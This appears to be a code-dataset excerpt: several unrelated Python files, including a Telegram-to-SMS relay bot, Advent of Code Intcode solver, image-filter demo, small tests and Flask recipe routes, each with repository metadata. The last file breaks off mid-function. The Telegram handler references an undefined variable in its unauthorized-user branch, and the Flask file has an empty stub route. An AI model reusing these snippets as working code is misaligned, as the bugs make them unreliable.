result, bins = qcut(s, 2, retbins=True)
assert_equal(result.cat.codes.values, [0, 0, 1, 1])
assert_almost_equal(bins, [0, 1.5, 3])
def curpath():
pth, _ = os.path.split(os.path.abspath(__file__))
return pth
if __name__ == '__main__':
nose.runmodule(argv=[__file__, '-vvs', '-x', '--pdb', '--pdb-failure'],
exit=False)
| 32.704797
| 96
| 0.557937
|
4a0218fda4e5cb91090460b19f9ee3ce523f97a5
| 346
|
py
|
Python
|
Filters/gaussian.py
|
Joevaen/Scikit-image_On_CT
|
e3bf0eeadc50691041b4b7c44a19d07546a85001
|
[
"Apache-2.0"
] | null | null | null |
Filters/gaussian.py
|
Joevaen/Scikit-image_On_CT
|
e3bf0eeadc50691041b4b7c44a19d07546a85001
|
[
"Apache-2.0"
] | null | null | null |
Filters/gaussian.py
|
Joevaen/Scikit-image_On_CT
|
e3bf0eeadc50691041b4b7c44a19d07546a85001
|
[
"Apache-2.0"
] | null | null | null |
# 多维高斯滤波器。
from skimage.filters import gaussian
from skimage import io, img_as_float
image = io.imread('/home/qiao/PythonProjects/Scikit-image_On_CT/Test_Img/4.jpg')
io.imshow(image)
io.show()
filtered_image = gaussian(image, 0.1)
io.imshow(filtered_image)
io.show()
filtered_image = gaussian(image, 0.6)
io.imshow(filtered_image)
io.show()
| 19.222222
| 80
| 0.771676
|
4a0219f5c9224891f53fe061ce3bea640866aa11
| 5,188
|
py
|
Python
|
handler.py
|
qguv/serverless-telegram-bot
|
14bac01411b75402a09ee268ed83b8d0fc35f57e
|
[
"MIT"
] | null | null | null |
handler.py
|
qguv/serverless-telegram-bot
|
14bac01411b75402a09ee268ed83b8d0fc35f57e
|
[
"MIT"
] | null | null | null |
handler.py
|
qguv/serverless-telegram-bot
|
14bac01411b75402a09ee268ed83b8d0fc35f57e
|
[
"MIT"
] | null | null | null |
import json
import telegram
import os
import logging
import urllib.parse
import re
import requests
from base64 import b64decode
# Logging is cool!
logger = logging.getLogger()
if logger.handlers:
for handler in logger.handlers:
logger.removeHandler(handler)
logging.basicConfig(level=logging.INFO)
telno_re = re.compile(r'^(\+?[0-9]+): (.*)$')
OK_RESPONSE = {
'statusCode': 200,
'headers': {'Content-Type': 'application/json'},
'body': json.dumps('ok')
}
ERROR_RESPONSE = {
'statusCode': 400,
'body': json.dumps('Oops, something went wrong!')
}
def configure_telegram():
"""
Configures the bot with a Telegram Token.
Returns a bot instance.
"""
TELEGRAM_TOKEN = os.environ['TELEGRAM_TOKEN']
return telegram.Bot(TELEGRAM_TOKEN)
def webhook(event, context):
"""
Runs the Telegram webhook.
"""
try:
CHAT_ID = int(os.environ['CHAT_ID'])
except KeyError:
CHAT_ID = None
bot = configure_telegram()
logger.info('Telegram event: {}'.format(event))
if event['requestContext']['http']['method'] == 'POST' and event['body']:
logger.info('Telegram message received')
update = telegram.Update.de_json(json.loads(event['body']), bot)
if CHAT_ID is not None and update.message.chat.id != CHAT_ID:
err = "Unauthorized user '{}' just tried to send a message:"
err = msg.format(update.message.from_user.username)
err_mdv2 = mdv2_escape(err)
quote_mdv2 = mdv2_escape(update.message.text)
msg_mdv2 = "_{}_\n\n```\n{}\n```".format(err_mdv2, quote_mdv2)
bot.send_message(chat_id=CHAT_ID, text=msg_mdv2, parse_mode=telegram.constants.PARSEMODE_MARKDOWN_V2)
return OK_RESPONSE
if update.message.text == '/id':
update.message.reply_text(str(update.message.chat.id), quote=True)
return OK_RESPONSE
if CHAT_ID is None:
return OK_RESPONSE
telno, text = get_telno(update.message)
if not telno:
msg_mdv2 = mdv2_escape(
"Where should I send this? Reply to a previous message or begin the "
"message with a phone number followed by a colon, e.g."
)
telno_mdv2 = mdv2_escape("+12003004000")
text_mdv2 = mdv2_escape(text)
update.message.reply_markdown_v2("_{}_\n\n```\n{}: {}\n```".format(msg_mdv2, telno_mdv2, text_mdv2), quote=True)
return OK_RESPONSE
send_sms(telno, text)
logger.info('Message sent to {}: {}'.format(update.message.chat.id, text))
update.message.reply_markdown_v2('_sent_', quote=True, disable_notification=True)
return OK_RESPONSE
return ERROR_RESPONSE
def set_webhook(event, context):
"""
Sets the Telegram bot webhook.
"""
PATH_TOKEN = os.environ['PATH_TOKEN']
logger.info('Setup event: {}'.format(event))
bot = configure_telegram()
url = 'https://{}/{}/tg'.format(
event.get('headers').get('host'),
PATH_TOKEN,
)
logger.info('Setting telegram webhook URL to: {}'.format(url))
webhook = bot.set_webhook(url)
if webhook:
return OK_RESPONSE
return ERROR_RESPONSE
def plivo_webhook(event, context):
"""
Receives SMS messages and forwards them to telegram
"""
CHAT_ID = int(os.environ['CHAT_ID'])
bot = configure_telegram()
logger.info('Plivo Event: {}'.format(event))
try:
body = parse_plivo_msg(event)
except AssertionError as e:
logger.info(e)
return ERROR_RESPONSE
sender = body['From']
msg = body['Text']
text = "{}: {}".format(sender, msg)
bot.send_message(chat_id=CHAT_ID, text=text)
logger.info('Message sent')
return OK_RESPONSE
def parse_plivo_msg(event):
assert event['requestContext']['http']['method'] == 'POST'
assert event['body']
logger.info('Plivo message received')
body = event['body']
if event['isBase64Encoded']:
body = b64decode(body).decode('utf-8')
body = urllib.parse.parse_qs(body)
return { k: v[0].strip() for k, v in body.items() }
def get_telno(message):
# try to get the telno from this message
m = telno_re.match(message.text)
if m:
return m.group(1), m.group(2)
# else try to get the telno from the message being replied to
antecedent = message.reply_to_message
if antecedent:
m = telno_re.match(antecedent.text)
if m:
return m.group(1), message.text
return None, message.text
def mdv2_escape(text):
for c in '_*[]()~`>#+-=|{}.!':
text = text.replace(c, "\\" + c)
return text
def send_sms(dest, text):
TELNO = os.environ['TELNO']
PLIVO_ID = os.environ['PLIVO_ID']
PLIVO_TOKEN = os.environ['PLIVO_TOKEN']
url = "https://api.plivo.com/v1/Account/{}/Message/".format(PLIVO_ID)
auth = (PLIVO_ID, PLIVO_TOKEN)
data = {
"src": TELNO,
"dst": dest,
"text": text,
}
logger.info('Sending SMS from {} to {}: {}'.format(TELNO, dest, text))
requests.post(url, auth=auth, json=data)
| 26.070352
| 124
| 0.621049
|
4a021a5351707c9ab786d769ee31ae01a4668e76
| 2,037
|
py
|
Python
|
nipy/testing/nosepatch.py
|
arokem/nipy
|
d6b2e862c65558bb5747c36140fd6261a7e1ecfe
|
[
"BSD-3-Clause"
] | 1
|
2016-03-08T15:01:06.000Z
|
2016-03-08T15:01:06.000Z
|
nipy/testing/nosepatch.py
|
fabianp/nipy
|
40e89f3ca7f34df05631623807993026134e6de3
|
[
"BSD-3-Clause"
] | 1
|
2015-09-09T07:49:57.000Z
|
2015-09-25T01:50:40.000Z
|
nipy/testing/nosepatch.py
|
fabianp/nipy
|
40e89f3ca7f34df05631623807993026134e6de3
|
[
"BSD-3-Clause"
] | null | null | null |
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
"""Monkeypatch nose to accept any callable as a method.
By default, nose's ismethod() fails for static methods.
Once this is fixed in upstream nose we can disable it.
Note: merely importing this module causes the monkeypatch to be applied."""
import unittest
import nose.loader
from inspect import ismethod, isfunction
def getTestCaseNames(self, testCaseClass):
"""Override to select with selector, unless
config.getTestCaseNamesCompat is True
"""
if self.config.getTestCaseNamesCompat:
return unittest.TestLoader.getTestCaseNames(self, testCaseClass)
def wanted(attr, cls=testCaseClass, sel=self.selector):
item = getattr(cls, attr, None)
# MONKEYPATCH: replace this:
#if not ismethod(item):
# return False
# return sel.wantMethod(item)
# With:
if ismethod(item):
return sel.wantMethod(item)
# static method or something. If this is a static method, we
# can't get the class information, and we have to treat it
# as a function. Thus, we will miss things like class
# attributes for test selection
if isfunction(item):
return sel.wantFunction(item)
return False
# END MONKEYPATCH
cases = filter(wanted, dir(testCaseClass))
for base in testCaseClass.__bases__:
for case in self.getTestCaseNames(base):
if case not in cases:
cases.append(case)
# add runTest if nothing else picked
if not cases and hasattr(testCaseClass, 'runTest'):
cases = ['runTest']
if self.sortTestMethodsUsing:
cases.sort(self.sortTestMethodsUsing)
return cases
##########################################################################
# Apply monkeypatch here
nose.loader.TestLoader.getTestCaseNames = getTestCaseNames
##########################################################################
| 36.375
| 75
| 0.62543
|
4a021cca467b73639e501f8ce8c417a2b0b223ef
| 2,178
|
py
|
Python
|
tests/test_parallel.py
|
benzatti/parallel
|
d5f44d53fc2633fe554fa6266e36c00ef6939d57
|
[
"MIT"
] | null | null | null |
tests/test_parallel.py
|
benzatti/parallel
|
d5f44d53fc2633fe554fa6266e36c00ef6939d57
|
[
"MIT"
] | 6
|
2022-03-10T04:31:07.000Z
|
2022-03-13T20:37:58.000Z
|
tests/test_parallel.py
|
benzatti/parallel
|
d5f44d53fc2633fe554fa6266e36c00ef6939d57
|
[
"MIT"
] | null | null | null |
from parallel import Parallel
import threading
import pytest
class Counter:
def __init__(self, initial_value):
self.lock = threading.RLock()
self.counter = initial_value
def increment(self):
with self.lock:
self.counter += 1
def add(self, x):
with self.lock:
self.counter += x
def get_value(self):
return self.counter
def test_parallel_invoke():
# Arrange
counter = Counter(0)
# Act
Parallel.invoke(
lambda: counter.increment(),
lambda: counter.increment(),
lambda: counter.increment(),
)
# Assert
assert 3 == counter.get_value()
def test_parallel_for_range():
# Arrange
counter = Counter(0)
# Act
Parallel.for_range(
start=0,
stop=10,
invoke=lambda x: counter.add(x),
)
# Assert
assert 45 == counter.get_value()
def test_parallel_for_each():
# Arrange
counter = Counter(0)
# Act
Parallel.for_each(
items=[1, 2, 3, 4],
invoke=lambda x: counter.add(x),
)
# Assert
assert 10 == counter.get_value()
def test_parallel_tasks():
# Arrange
resume_task_two = threading.Event()
resume_task_three = threading.Event()
end_of_test = threading.Event()
results = []
def task_one():
results.append("one")
resume_task_three.set()
def task_two():
resume_task_two.wait()
results.append("two")
end_of_test.set()
def task_three():
resume_task_three.wait()
results.append("three")
resume_task_two.set()
# Act
Parallel.invoke(
task_one,
task_two,
task_three,
)
end_of_test.wait()
# Assert
assert ["one", "three", "two"] == results
def test_parallel_invoke_empty_arguments():
with pytest.raises(ValueError):
Parallel.invoke()
def test_parallel_for_each_with_invalid_arguments():
with pytest.raises(TypeError):
Parallel.for_each(None, None)
def test_parallel_for_range_with_invalid_arguments():
with pytest.raises(TypeError):
Parallel.for_range(None, None, None)
| 19.105263
| 53
| 0.61157
|
4a021d32e1abdaecb1ba2595eaffdaabf68200b8
| 1,245
|
py
|
Python
|
python/113_path_sum_ii.py
|
ufjfeng/leetcode-soln
|
cbf2db0d81d5ef98f48c8d1df486559f89142bfd
|
[
"MIT"
] | null | null | null |
python/113_path_sum_ii.py
|
ufjfeng/leetcode-soln
|
cbf2db0d81d5ef98f48c8d1df486559f89142bfd
|
[
"MIT"
] | null | null | null |
python/113_path_sum_ii.py
|
ufjfeng/leetcode-soln
|
cbf2db0d81d5ef98f48c8d1df486559f89142bfd
|
[
"MIT"
] | 1
|
2019-11-22T19:28:11.000Z
|
2019-11-22T19:28:11.000Z
|
"""
Given a binary tree and a sum, find all root-to-leaf paths where each path's sum
equals the given sum.
For example:
Given the below binary tree and sum = 22,
5
/ \
4 8
/ / \
11 13 4
/ \ / \
7 2 5 1
return
[
[5,4,11,2],
[5,8,4,5]
]
"""
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution(object):
def pathSum(self, root, psum):
"""
:type root: TreeNode
:type sum: int
:rtype: List[List[int]]
"""
if root is None:
return []
self.solns = []
self.dfs(root, psum, [])
return self.solns
def dfs(self, root, psum, soln):
if root.left is None and root.right is None:
if psum == root.val:
soln.append(root.val)
self.solns.append(soln)
if root.left:
self.dfs(root.left, psum - root.val, soln + [root.val])
if root.right:
self.dfs(root.right, psum - root.val, soln + [root.val])
| 24.411765
| 80
| 0.469076
|
4a021d401bb0b12b97dc34a8e28e2b292128fef3
| 234
|
py
|
Python
|
python/figurl/plugins/builtin/markdown/Markdown.py
|
magland/figurl
|
f254fb72cc23d95c5d53f8829d70e4621162c7f7
|
[
"Apache-2.0"
] | 2
|
2021-12-03T14:29:01.000Z
|
2022-01-28T16:07:49.000Z
|
python/figurl/plugins/builtin/markdown/Markdown.py
|
magland/figurl
|
f254fb72cc23d95c5d53f8829d70e4621162c7f7
|
[
"Apache-2.0"
] | 21
|
2021-08-31T19:56:34.000Z
|
2021-12-08T17:14:17.000Z
|
python/figurl/plugins/builtin/markdown/Markdown.py
|
magland/figurl
|
f254fb72cc23d95c5d53f8829d70e4621162c7f7
|
[
"Apache-2.0"
] | null | null | null |
from typing import List
from figurl.core.Figure import Figure
class Markdown(Figure):
def __init__(self, source: str):
data = {
'source': source
}
super().__init__(type='Markdown.1', data=data)
| 26
| 54
| 0.619658
|
4a021e74fc9833babfd5183896f1ecacc698cad5
| 15,149
|
py
|
Python
|
2019Day11Part1.py
|
BenWichser/Advent_of_code_2019_day1_part1
|
61c0fe0461f06a85ec02c54cd8d61bdde54d37c7
|
[
"MIT"
] | null | null | null |
2019Day11Part1.py
|
BenWichser/Advent_of_code_2019_day1_part1
|
61c0fe0461f06a85ec02c54cd8d61bdde54d37c7
|
[
"MIT"
] | null | null | null |
2019Day11Part1.py
|
BenWichser/Advent_of_code_2019_day1_part1
|
61c0fe0461f06a85ec02c54cd8d61bdde54d37c7
|
[
"MIT"
] | null | null | null |
# Author: Ben Wichser
# Date: 12/11/2019
# Description: Paint the spaceship. How many sectors are painted? see www.adventofcode.com/2019 (day 11) for more information
code_list = [3, 8, 1005, 8, 339, 1106, 0, 11, 0, 0, 0, 104, 1, 104, 0, 3, 8, 1002, 8, -1, 10, 101, 1, 10, 10, 4, 10, 1008, 8, 0, 10, 4, 10, 1002, 8, 1, 29, 2, 1108, 11, 10, 1, 1, 20, 10, 2, 107, 6, 10, 3, 8, 102, -1, 8, 10, 101, 1, 10, 10, 4, 10, 108, 0, 8, 10, 4, 10, 101, 0, 8, 62, 1006, 0, 29, 1006, 0, 12, 1, 1101, 5, 10, 1, 2, 20, 10, 3, 8, 102, -1, 8, 10, 1001, 10, 1, 10, 4, 10, 1008, 8, 0, 10, 4, 10, 1001, 8, 0, 99, 1006, 0, 30, 3, 8, 1002, 8, -1, 10, 1001, 10, 1, 10, 4, 10, 1008, 8, 0, 10, 4, 10, 1001, 8, 0, 124, 1006, 0, 60, 3, 8, 1002, 8, -1, 10, 1001, 10, 1, 10, 4, 10, 1008, 8, 1, 10, 4, 10, 101, 0, 8, 149, 2, 1007, 2, 10, 1, 1105, 10, 10, 3, 8, 1002, 8, -1, 10, 101, 1, 10, 10, 4, 10, 108, 0, 8, 10, 4, 10, 101, 0, 8, 178, 1, 1108, 15, 10, 1, 1101, 5, 10, 1, 109, 8, 10, 1006, 0, 20, 3, 8, 102, -1, 8, 10, 1001, 10, 1, 10, 4, 10, 108, 1, 8, 10, 4, 10, 101, 0, 8, 215, 1006, 0, 61, 1006, 0, 16, 2, 1105, 15, 10, 1006, 0, 50, 3, 8, 1002, 8, -1, 10, 1001, 10, 1, 10, 4, 10, 108, 1, 8, 10, 4, 10, 101, 0, 8, 250, 1, 1003, 10, 10, 1, 9, 19, 10, 2, 1004, 6, 10, 2, 1106, 2, 10, 3, 8, 1002, 8, -1, 10, 1001, 10, 1, 10, 4, 10, 1008, 8, 1, 10, 4, 10, 101, 0, 8, 289, 1, 1103, 13, 10, 2, 105, 17, 10, 3, 8, 1002, 8, -1, 10, 1001, 10, 1, 10, 4, 10, 108, 1, 8, 10, 4, 10, 1002, 8, 1, 318, 101, 1, 9, 9, 1007, 9, 1086, 10, 1005, 10, 15, 99, 109, 661, 104, 0, 104, 1, 21101, 0, 825599304340,1, 21101, 356, 0, 0, 1106, 0, 460, 21101, 0, 937108545948, 1, 21102, 1, 367, 0, 1106, 0, 460, 3, 10, 104, 0, 104, 1, 3, 10, 104, 0, 104, 0, 3, 10, 104, 0, 104, 1, 3, 10, 104, 0, 104, 1, 3, 10, 104, 0, 104, 0, 3, 10, 104, 0, 104, 1, 21102, 1, 21628980315, 1, 21101, 0, 414, 0, 1105, 1, 460, 21101, 0, 3316673539, 1, 21101, 425, 0, 0, 1106, 0, 460, 3, 10, 104, 0, 104, 0, 3, 10, 104, 0, 104, 0, 21102, 988753428840, 1, 1, 21102, 1, 448, 0, 1106, 0, 460, 21102, 825544569700, 1, 1, 21102, 459, 1, 0, 1106, 0, 460, 99, 109, 2, 21202, -1, 1, 1, 21102, 1, 40, 2, 21102, 491, 1, 3, 21102, 481, 1, 0, 1105, 1, 524, 109, -2, 2106, 0, 0, 0, 1, 0, 0, 1, 109, 2, 3, 10, 204, -1, 1001, 486, 487, 502, 4, 0, 1001, 486, 1, 486, 108, 4, 486, 10, 1006, 10, 518, 1101, 0, 0, 486, 109, -2, 2105, 1, 0, 0, 109, 4, 2102, 1, -1, 523, 1207, -3, 0, 10, 1006, 10, 541, 21102, 0, 1, -3, 21201, -3, 0, 1, 22102, 1, -2, 2, 21102, 1, 1, 3, 21102, 560, 1, 0, 1106, 0, 565, 109, -4, 2105, 1, 0, 109, 5, 1207, -3, 1, 10, 1006, 10, 588, 2207, -4, -2, 10, 1006, 10, 588, 22101, 0, -4, -4, 1105, 1, 656, 21202, -4, 1, 1, 21201, -3, -1, 2, 21202, -2, 2, 3, 21102, 1, 607, 0, 1106, 0, 565, 22102, 1, 1, -4, 21101, 0, 1, -1, 2207, -4, -2, 10, 1006, 10, 626, 21101, 0, 0, -1, 22202, -2, -1, -2, 2107, 0, -3, 10, 1006, 10, 648, 21202, -1, 1, 1, 21101, 0, 648, 0, 105, 1, 523, 21202, -2, -1, -2, 22201, -4, -2, -4, 109, -5, 2105, 1, 0]
def grid_maker(width, height):
"""Accepts width, height (ints). Returns widthxheight grid with '.' as values."""
grid = [['.' for i in range(width)] for j in range(height)]
return grid
def intcode_parse(code):
"""Accepts intcode. Parses intcode and returns individual parameters. """
actual_code = code % 100
parameter_piece = code - actual_code
parameter_piece = parameter_piece // 100
parameter_code_list = []
while parameter_piece > 0:
parameter_code_list.append(parameter_piece % 10)
parameter_piece = parameter_piece // 10
return (actual_code, parameter_code_list)
def parameter_code_sizer(opcode, raw_parameter_code_list):
"""Ensures parameter code list is the correct length, according to the particular opcode."""
parameter_lengths = {1: 3, 2: 3, 3: 1, 4: 1,
5: 2, 6: 2, 7: 3, 8: 3, 9: 1, 99: 0}
while len(raw_parameter_code_list) < parameter_lengths[opcode]:
raw_parameter_code_list.append(0)
return raw_parameter_code_list
def code_list_lengthener(code_list, parameter):
"""Ensures that code_list is long enough to accept an item in its parameter-th location"""
while len(code_list) < parameter+1:
code_list.append(0)
return code_list
def parameter_tuple_maker(parameter_code, code_list, i):
"""
Accepts parameter_code, code_list, relative_base, and i.
Returns parameter_code, parameter tuple for opcode operation.
"""
return (parameter_code, code_list[i])
def parameter_tuple_parser(parameter_tuple, code_list, relative_base):
"""
Accepts parameter_tuple, code_list, and relative_base. Returns parameter for use in intcode operation.
"""
if parameter_tuple[0] == 0:
code_list_lengthener(code_list, parameter_tuple[1])
return code_list[parameter_tuple[1]]
elif parameter_tuple[0] == 1:
return parameter_tuple[1]
elif parameter_tuple[0] == 2:
return code_list[parameter_tuple[1] + relative_base]
else:
print('And I oop.... parameter_tuple_parser')
def color_coder(grid, current):
"""Accepts spaceship grid. Returns 0 if current space is black ('.'), and 1 if current space is white ('.')"""
if grid[current[0]][current[1]] == '.':
return 0
elif grid[current[0]][current[1]] == '#':
return 1
else:
print("And I oop...color_coder")
def intcode_one(parameter_list, code_list, relative_base):
"""Adds elements in the parameter_list's first two elements. Places sum in parameter_list[2]. Returns True. """
for i in range(len(parameter_list) - 1):
parameter_list[i] = parameter_tuple_parser(
parameter_list[i], code_list, relative_base)
if parameter_list[-1][0] == 0:
code_list = code_list_lengthener(code_list, parameter_list[-1][1])
code_list[parameter_list[-1][1]
] = parameter_list[0] + parameter_list[1]
elif parameter_list[-1][0] == 2:
code_list = code_list_lengthener(
code_list, parameter_list[-1][1]+relative_base)
code_list[parameter_list[-1][1] +
relative_base] = parameter_list[0] + parameter_list[1]
else:
print("And I oop... intcode_one")
return True
def intcode_two(parameter_list, code_list, relative_base):
"""Multiplies elements in the parameter_list's first two elements. Places product in parameter_list[2]. Returns True. """
for i in range(len(parameter_list) - 1):
parameter_list[i] = parameter_tuple_parser(
parameter_list[i], code_list, relative_base)
if parameter_list[-1][0] == 0:
code_list = code_list_lengthener(code_list, parameter_list[-1][1])
code_list[parameter_list[-1][1]
] = parameter_list[0] * parameter_list[1]
elif parameter_list[-1][0] == 2:
code_list = code_list_lengthener(
code_list, parameter_list[-1][1]+relative_base)
code_list[parameter_list[-1][1] +
relative_base] = parameter_list[0] * parameter_list[1]
else:
print("And I oop...intcode_two")
return True
def intcode_three(parameter_list, code_list, relative_base, grid, current):
""" Accepts input and places it in parameter_list[0] place in code_list. Returns True. """
number_in = color_coder(grid, current)
if parameter_list[0][0] == 0:
code_list = code_list_lengthener(code_list, parameter_list[0][1])
code_list[parameter_list[0][1]] = number_in
elif parameter_list[0][0] == 2:
code_list = code_list_lengthener(
code_list, parameter_list[0][1]+relative_base)
code_list[parameter_list[0][1] + relative_base] = number_in
else:
print("And I oop...intcode_three")
return True
def intcode_four(parameter_list, code_list, relative_base):
""" Returns item in parameter_list[0] place in code_list. """
for i in range(len(parameter_list)):
parameter_list[i] = parameter_tuple_parser(
parameter_list[i], code_list, relative_base)
if parameter_list[-1] not in {0, 1}:
print("And I oop...intcode_four")
return parameter_list[-1]
def intcode_five(parameter_list, code_list, relative_base, i):
"""If first parameter is non-zero, sets instruction pointer to second parameter. Returns i"""
for j in range(len(parameter_list)):
parameter_list[j] = parameter_tuple_parser(
parameter_list[j], code_list, relative_base)
if parameter_list[0] != 0:
i = parameter_list[-1]
return i
def intcode_six(parameter_list, code_list, relative_base, i):
"""If first parameter is zero, sets instruction pointer to second parameter. Returns i"""
for j in range(len(parameter_list)):
parameter_list[j] = parameter_tuple_parser(
parameter_list[j], code_list, relative_base)
if parameter_list[0] == 0:
i = parameter_list[-1]
return i
def intcode_seven(parameter_list, code_list, relative_base):
"""If first parameter is less than second parameter, stores 1 in third parameter. Else stores 0 in third parameter. Returns True"""
for i in range(len(parameter_list) - 1):
parameter_list[i] = parameter_tuple_parser(
parameter_list[i], code_list, relative_base)
if parameter_list[-1][0] == 0:
parameter_list[-1] = parameter_list[-1][1]
elif parameter_list[-1][0] == 2:
parameter_list[-1] = parameter_list[-1][1] + relative_base
if parameter_list[0] < parameter_list[1]:
code_list = code_list_lengthener(code_list, parameter_list[-1])
code_list[parameter_list[-1]] = 1
else:
code_list = code_list_lengthener(code_list, parameter_list[-1])
code_list[parameter_list[-1]] = 0
return True
def intcode_eight(parameter_list, code_list, relative_base):
"""If first parameter is equal to second parameter, stores 1 in third parameter. Else stores 0 in third parameter. Returns True"""
for i in range(len(parameter_list) - 1):
parameter_list[i] = parameter_tuple_parser(
parameter_list[i], code_list, relative_base)
if parameter_list[-1][0] == 0:
parameter_list[-1] = parameter_list[-1][1]
elif parameter_list[-1][0] == 2:
parameter_list[-1] = parameter_list[-1][1] + relative_base
if parameter_list[0] == parameter_list[1]:
code_list = code_list_lengthener(code_list, parameter_list[-1])
code_list[parameter_list[-1]] = 1
else:
code_list = code_list_lengthener(code_list, parameter_list[-1])
code_list[parameter_list[-1]] = 0
return True
def intcode_nine(parameter_list, code_list, relative_base):
""" Adjust the relative base by the first parameter. Returns new relative_base"""
for i in range(len(parameter_list)):
parameter_list[i] = parameter_tuple_parser(
parameter_list[i], code_list, relative_base)
relative_base += parameter_list[0]
return relative_base
def intcode_ninetynine(parameter_list, code_list):
"""Returns False, so we can exit loop and script."""
return False
def robot_paint(grid, painted_locations, current, instruction_list):
"""Makes robot paint given location on grid. Updates and returns grid, painted_locations. """
painted_locations.add(current)
if instruction_list[0] == 0:
grid[current[0]][current[1]] = '.'
elif instruction_list[0] == 1:
grid[current[0]][current[1]] = '#'
else:
print('And I oop...robot_paint')
return grid, painted_locations
def robot_move(current, direction):
"""Moves robot one square, depending on current direction it is facing. Returns new current."""
if direction == 0:
current = (current[0] - 1, current[1])
elif direction == 1:
current = (current[0], current[1] + 1)
elif direction == 2:
current = (current[0] + 1, current[1])
elif direction == 3:
current = (current[0], current[1] - 1)
else:
print("And I oop...robot_move")
return current
def robot_turn(direction, instruction_list):
""" Turns robot. Returns direction."""
if instruction_list[1] == 0:
direction -= 1
elif instruction_list[1] == 1:
direction += 1
else:
print("And I oop....robot_do_it (2)")
direction %= 4
return direction
def robot_do_it(grid, painted_locations, current, direction, instruction_list):
"""Paints, moves, turns robot."""
grid, painted_locations = robot_paint(
grid, painted_locations, current, instruction_list)
direction = robot_turn(direction, instruction_list)
current = robot_move(current, direction)
return grid, painted_locations, current, direction
# Create grid
height = 1000
width = 1000
grid = grid_maker(height, width)
# Initialize placement and direction
current = (height//2, width//2)
direction = 0
i = 0
relative_base = 0
instruction_list = []
painted_locations = set()
keep_going = True
while keep_going:
while len(instruction_list) < 2:
# reads raw opcode
raw_opcode = code_list[i]
i += 1
# does intcode operation direction parsing
(opcode, raw_parameter_code_list) = intcode_parse(raw_opcode)
# Ensure the parameter code list is correct length for the code.
parameter_code_list = parameter_code_sizer(
opcode, raw_parameter_code_list)
# Create actual list of parameters for each opcode operation
parameter_list = []
# grabs parameters, as necessary
index = 0
while len(parameter_list) < len(parameter_code_list):
parameter_list.append(parameter_tuple_maker(
parameter_code_list[index], code_list, i))
i += 1
index += 1
if opcode == 1:
intcode_one(parameter_list, code_list, relative_base)
elif opcode == 2:
intcode_two(parameter_list, code_list, relative_base)
elif opcode == 3:
intcode_three(parameter_list, code_list,
relative_base, grid, current)
elif opcode == 4:
instruction_list.append(intcode_four(
parameter_list, code_list, relative_base))
elif opcode == 5:
i = intcode_five(parameter_list, code_list, relative_base, i)
elif opcode == 6:
i = intcode_six(parameter_list, code_list, relative_base, i)
elif opcode == 7:
intcode_seven(parameter_list, code_list, relative_base)
elif opcode == 8:
intcode_eight(parameter_list, code_list, relative_base)
elif opcode == 9:
relative_base = intcode_nine(
parameter_list, code_list, relative_base)
elif opcode == 99:
keep_going = intcode_ninetynine(parameter_list, code_list)
else:
print('and I oop... opcode error')
# We have two instructions.
grid, painted_locations, current, direction = robot_do_it(
grid, painted_locations, current, direction, instruction_list)
instruction_list = []
print(len(painted_locations))
| 43.406877
| 2,789
| 0.634629
|
4a021eb85ed52b336da356d90c3864cc6af5180e
| 6,471
|
py
|
Python
|
app/api/recipe_routes.py
|
michael-gann/larder
|
3de59ef5b403215e42858ee4007bc7926506478c
|
[
"Unlicense"
] | null | null | null |
app/api/recipe_routes.py
|
michael-gann/larder
|
3de59ef5b403215e42858ee4007bc7926506478c
|
[
"Unlicense"
] | 2
|
2021-03-05T18:48:56.000Z
|
2021-03-05T18:51:49.000Z
|
app/api/recipe_routes.py
|
michael-gann/larder
|
3de59ef5b403215e42858ee4007bc7926506478c
|
[
"Unlicense"
] | null | null | null |
from flask import Blueprint, jsonify, request
from app.models import Recipe, RecipeStep, RecipeIngredient, db
from sqlalchemy.orm import selectinload
from app.forms import RecipeForm
recipe_routes = Blueprint('recipes', __name__)
@recipe_routes.route("", methods=["GET"]) # get all recipes by current user
def recipes():
# get current user in query string
userId = request.args.get("userId")
recipes_query = Recipe.query.filter_by(user_id=userId).options(
selectinload(Recipe.recipe_ingredients),
selectinload(Recipe.recipe_steps)).all()
recipes = [
{
**r.to_dict(),
"ingredients": [
{
**i.to_dict(),
"ingredient": i.ingredients.to_dict(),
"measurement": i.measurements.to_dict(),
} for i in r.recipe_ingredients
],
"steps": [
s.to_dict() for s in r.recipe_steps
]
} for r in recipes_query
]
recipes_by_id = [
{recipe["id"]: {**recipe}}
for recipe in recipes
]
return jsonify(recipes_by_id)
@recipe_routes.route("/5", methods=["GET"])
def something():
pass
@recipe_routes.route("/<int:id>", methods=["GET"]) # get a single recipe by ID
def recipe(id):
recipe_query = Recipe.query.options(selectinload(
Recipe.recipe_ingredients), selectinload(Recipe.recipe_steps)).get(id)
if recipe_query is None:
return {"exists": False}
recipe = {**recipe_query.to_dict(),
"ingredients": [
{**i.to_dict(),
"ingredient": i.ingredients.to_dict(),
"measurement": i.measurements.to_dict()}
for i in recipe_query.recipe_ingredients
],
"steps": [s.to_dict() for s in recipe_query.recipe_steps]
}
return recipe
@recipe_routes.route("", methods=["POST"]) # commit a recipe to the db
def post_recipes():
# TODO: data validation
form = RecipeForm()
form['csrf_token'].data = request.cookies['csrf_token']
if form.validate_on_submit():
is_edit = form.recipe_id.data is not None
if is_edit:
recipe_ingredients_to_delete = RecipeIngredient.query.filter_by(
recipe_id=form.recipe_id.data).all()
recipe_steps_to_delete = RecipeStep.query.filter_by(
recipe_id=form.recipe_id.data).all()
for ri in recipe_ingredients_to_delete:
db.session.delete(ri)
for rs in recipe_steps_to_delete:
db.session.delete(rs)
recipe_to_edit = Recipe.query.get(form.recipe_id.data)
recipe_to_edit.name = form.name.data
recipe_to_edit.content = form.content.data
db.session.add(recipe_to_edit)
for ingredient in form.ingredients.entries:
recipe_ingredient = RecipeIngredient(
recipe_id=form.recipe_id.data,
ingredient_id=ingredient.ingredient_id.data,
measurement_id=ingredient.measurement_id.data,
quantity=ingredient.quantity.data
)
db.session.add(recipe_ingredient)
for step in form.steps.entries:
step = RecipeStep(
recipe_id=form.recipe_id.data,
step_number=step.step_number.data,
content=step.content.data
)
db.session.add(step)
db.session.commit()
editted_recipe_query = Recipe.query.options(selectinload(
Recipe.recipe_ingredients),
selectinload(Recipe.recipe_steps)).get(form.recipe_id.data)
editted_recipe_expanded = {**editted_recipe_query.to_dict(),
"ingredients": [
{**i.to_dict(),
